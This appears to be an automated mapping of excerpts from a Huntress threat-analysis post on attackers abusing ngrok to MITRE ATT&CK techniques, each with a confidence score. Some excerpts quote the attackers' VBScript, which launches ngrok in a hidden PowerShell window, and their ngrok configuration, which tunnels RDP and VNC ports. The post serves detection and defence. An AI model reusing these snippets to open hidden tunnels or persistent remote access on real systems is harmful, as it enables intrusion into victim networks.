".Shell") command = "powershell -windowstyle hidden c:\programdata\windnt\conhost.exe start --config=c:\programdata\windnt\ngrok.yml --all --region=eu" objshell.run command, 0 set objshell = nothing this is a visual basic script — code that will nat…"
T1572 Protocol Tunneling (97%)
"internet (including those programmer buddies i mentioned!) can access this site. checking back at the ngrok output: very cool! we can see the requests that came in and the number of connections. now i can stop ngrok, and that will tear down the tunnel — that public endpoint no…"
T1572 Protocol Tunneling (96%)
"abusing ngrok: hackers at the end of the tunnel | huntress do you know that expression, “light at the end of the tunnel?” usually, that has a positive connotation. after some hard work or persevering through something difficult or unpleasant, you can see "the light at the end…"
T1547.001 Registry Run Keys / Startup Folder (95%)
"heavy” compared to some of the simple techniques they could have used, but hey — a graphical interface to keep hacking away on their target? i’m sure they won’t turn that down. while we found that persistent vbscript code, we also found a vnc server “winvnc.exe” (that is…"
T1219 Remote Access Tools (85%)
"or any open access to any graphical interface remote control could be devastating to an organization. in this case, hackers use it for persistence, but can also weaponize this to continue their campaign, exfiltrate data, potentially perform more lateral movement and more. it is, …"
T1021.001 Remote Desktop Protocol (73%)
"or any open access to any graphical interface remote control could be devastating to an organization. in this case, hackers use it for persistence, but can also weaponize this to continue their campaign, exfiltrate data, potentially perform more lateral movement and more. it is, …"
T1572 Protocol Tunneling (73%)
"tunnel.” that’s why at huntress, we hunt. it’s vital to know this tradecraft and understand these tactics, so we can better detect and prevent incidents like this... before hackers are the ones at the other end of the pipe. faqs what is ngrok and how does it work? ngrok is a…"
T1572 Protocol Tunneling (65%)
", though — where are those supplied? well, we will have to dive into that configuration file it mentioned! malicious ngrok configuration file tunnels: rdp: proto: tcp addr: 3389 wnc: proto: tcp addr: 6300 mobil: proto: tcp addr: 3128 (the configuration file also includ…"
T1021.001 Remote Desktop Protocol (60%)
"have already compromised this target. if rdp wasn’t enough, they double it up with a tunnel to access vnc (virtual network computer), which offers practically the same functionality as rdp. graphical desktop sharing — so the hackers can take advantage of this remote access th…"
T1572 Protocol Tunneling (44%)
"…ware strains that incorporate ngrok in their attack chain. huntress can help protect your organization from ngrok exploitation. get a free demo to see huntress in action."
T1090.002 External Proxy (43%)
"using ngrok to send users to a malicious site under the guise of a legitimate url), command and control, or data exfiltration by forwarding data through the secure tunnel. what are the signs that ngrok has been hacked? while end users won’t often see malicious tampering with t…"
T1090 Proxy (37%)
"using ngrok to send users to a malicious site under the guise of a legitimate url), command and control, or data exfiltration by forwarding data through the secure tunnel. what are the signs that ngrok has been hacked? while end users won’t often see malicious tampering with t…"
T1090.001 Internal Proxy (35%)
"abusing ngrok: hackers at the end of the tunnel | huntress do you know that expression, “light at the end of the tunnel?” usually, that has a positive connotation. after some hard work or persevering through something difficult or unpleasant, you can see "the light at the end…"
T1090 Proxy (33%)
"tunnel.” that’s why at huntress, we hunt. it’s vital to know this tradecraft and understand these tactics, so we can better detect and prevent incidents like this... before hackers are the ones at the other end of the pipe. faqs what is ngrok and how does it work? ngrok is a…"
Summary
At the end of this tunnel, we find some shady hackers using ngrok to gain remote control access to victim networks.